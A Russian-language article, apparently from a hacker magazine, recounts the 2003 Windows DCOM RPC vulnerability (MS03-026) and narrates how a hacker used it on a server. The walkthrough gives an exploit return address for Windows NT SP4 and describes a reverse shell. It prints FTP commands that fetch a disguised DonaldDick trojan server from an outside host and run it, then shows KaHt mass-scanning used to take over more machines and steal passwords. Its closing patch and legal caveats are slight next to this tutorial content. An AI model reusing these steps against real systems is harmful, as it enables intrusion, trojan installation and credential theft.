Уязвимость была устрашающей, правда
готовый эксплоит оказался недоступен для
основной массы людей... Наверное поэтому
никто не чувствовал страха...

16/7/2003

Группа польских экспертов в области
безопасности компьютерных технологий "Last
Stage of Delirium" сообщила публике о найденной
ими уязвимости, обработки DCOM объектов в
контексте RPC протокола. Это было чем-то
потрясающим, поскольку данный протокол
использовался практически всеми
существующими на этот момент версиями Windows.
Уязвимыми оказались ОС Windows NT, Windows XP, Windows 2000
и даже Windows Server 2003 был под прицелом. Этого
было более чем достаточно, чтобы завладеть
компьютерами большинства пользователей
сети Internet. Более того, многие серверы не
блокировали входящие пакеты на 135 порт,
именно он использовался для атаки. Что
делало их потенциальными жертвами.

17/7/2003

Но спустя несколько часов Todd Sabin сообщает,
что уязвимыми являются все сервисы RPC. Это
значит, что настройка брандмауэра на
блокировку 135 порта является не достаточным
средством защиты. Опасности подвергаются
компьютеры с открытыми 135 (UDP/TCP), 139, 445 и 593
портами. СМИ освещают данную ошибку, как
потенциальную угрозу для безопасности
пользователей Windows. Дело шло к глобальной
катастрофе. Но поскольку публичного
эксплоита выпущено не было, все продолжали
жить своей прежней жизнью не задумываясь о
последствиях его появления в массах.

Но не все так пассивно отреагировали на
появление данной уязвимости. Хакеры
понемногу начинали писать приватные
эксплоиты, а script kids продолжали ждать его
появления. Результат не заставил себя долго
ждать. В течении нескольких дней появляются
некоторые наработки в этой области,
появляются первые эксплоиты. Тем не менее
большинство из них просто провоцирует сбой
на удаленной системе. Что можно объяснить,
поскольку технических деталей по поводу
найденной уязвимости известно не было. Хотя
некоторые версии ОС уже успешно
эксплуатировались.

25/7/2003

Этот день стал переломным в истории
эксплуатации данной уязвимости. Наконец
появляется техническое описание проблемы.
После чего рождается большое количество
эксплоитов, под разные версии Windows.
Некоторые из них имеют даже графический
интерфейс, а иногда и функцию сканирования
определенного диапазона IP адресов.

Именно в этот момент началась массивная
атака хакеров на рядовых пользователей.
Более того, появился интернет червь MS Blast,
который с легкостью проникал на компьютеры
подключенные к Интернету и даже в
корпоративные сети крупнейших компаний
мира. В опасности оказались все...

Напасть на удаленную машину не составляет
особого труда. Поэтому script kids взялись за
свое дело. Кража кредитных кард и приватных
эксплоитов возросла в несколько раз. И
многие лакомые сегменты сети стали
пробоваться на вкус. Именно этим занялся
один хакер. Он давно хотел захватить сервер,
но приличной уязвимости под него до этого
не было. А не воспользоваться таким
подарком судьбы он просто не мог.

Пьеса в три акта

Первое, что пришлось ему сделать перед
атакой, это проверить какая именно
операционная система установлена на
сервере. Для этого он воспользовался
утилитой nmap. Хакер не раз уже писал о ее
возможностях, но я повторюсь и скажу, что
она используется для определения версии ОС
на удаленном компьютере. Благо она
существует как для Windows, так и для *nix. А
поскольку хакер для своей работы
использовал Windows, то его выбор пал на
графический вариант nmap.

Несколько минут работы сканера и
результат позитивный. 135 порт оказался
открытым и не защищенным брандмауэром. Это
было началом конца, началом долгожданной
атаки. На этот момент уже было написано
много эксплоитов, в том числе и "RCP Exploit GUI #2".
Его отличительной чертой было то, что он
имел графический интерфейс и содержал в
себе встроенные функции сканирования
диапазона IP, а также FTP сервер.

Запустив эксплоит, он указал адрес
целевого компьютера. Но в списке ОС для
атакуемых машин Windows NT указан не был. А ведь
именно она была установлена на сервере. Это
серьезная проблема, поскольку чтобы
запустить эксплоит необходимо знать его
точный адрес в памяти, чтобы потом передать
на него управление. Немного покопавшись в
файлах, скачанных вместе с эксплоитом он
нашел небольшой список адресов под широкую
разновидность линейки Windows. Среди них
присутствовал и Windows NT с предустановленным
Service Pack 4. Именно его значение он указал в
качестве адреса возврата, плюнув на ручной
выбор ОС. Число 0xE527F377 стало его тайным
пропуском в жизнь сервера. И он начал атаку.

Система сдалась без каких-либо
происшествий, так у хакера появился reverse-shell
с удаленным сервером. Теперь, когда он мог
исполнять на нем все что угодно, пришло
время установить Троян. Среди большого
числа возможных, был выбран DonaldDick. Для
осуществления своего плана ему пришлось
получить хостинг на бесплатном сервере с
поддержкой FTP. Вполне подошел BY.RU, именно
туда он и закачал сервер для трояна. Теперь,
когда DonaldDick стал доступным по FTP, он обратно
взялся за жертву, а точнее начал закачивать
на нее сервер трояна. Это был хорошо
продуманный план, поскольку уязвимость
могли пропатчить, а троян он и в Африке
троян. Набрав в консоли ftp он принялся
закачивать файл. Весь процесс занял у него,
написания всего лишь пяти строк:

open by.ru
имя_сервера.by.ru
пароль
get fooware.exe
bye

Где fooware.exe это переименованный сервер для
DonaldDick. Когда файл закачался, ему осталось
только запустить его. Для этого он просто
написал имя файла (fooware.exe) и с наслаждением
нажал Enter... После чего хакер получил удобный
контроль над сервером.

Но знаете как оно всегда бывает, когда
находишь что-то интересное продолжаешь с
этим играть. Так и наш Хакер захотел
получить более чем одну систему. Посмотрев,
что эксплоит KaHt
2
позволяет провести массивное
сканирование, он взялся за работу, а точнее
за работу взялся KaHt. Его использование
оказалось не трудным. Так например, чтобы
про сканировать сеть с IP 192.168.0.* (класс С), ему
нужно было набрать "KaHt.exe 129.168.0.1
192.168.0.254". Что собственно он и сделал,
после чего периодически проверял
результаты. Таким образом он получил доступ
к еще большему количеству пользователей, от
которых потом сумел получить пароли на
разные сервисы, почты, и много другой
полезной информации. Не говоря уже про то,
что он стал пользоваться многими из них как
анонимными прокси. 

Пища к размышлению

Хотя Microsoft давно выпустила заплатку,
пользователи и админы не спешат
устанавливать патчи, надеясь что их сеть не
будет никому интересной. Но таких хакеров
большое количество и установка патча это
скорее необходимость, нежели возможность.
Еще можно блокировать все входящие пакеты
на 135, 139, 445 и 593 порты.

Естественно, что все это хакер делал через
анонимную прокси, а в результате почистил
за собой следы присутствия в системе. Но вам
следует задуматься, прежде чем повторять
его подвиги. Ведь такие действия считаются
противозаконными и могут закончиться для
вас достаточно плачевно...

Патч:
http://www.microsoft.com/technet/security/bulletin/MS03-026.asp

KaHT II
RPC Exploit GUI v2
DCOM Win 32 эксплоит

Оставить мнение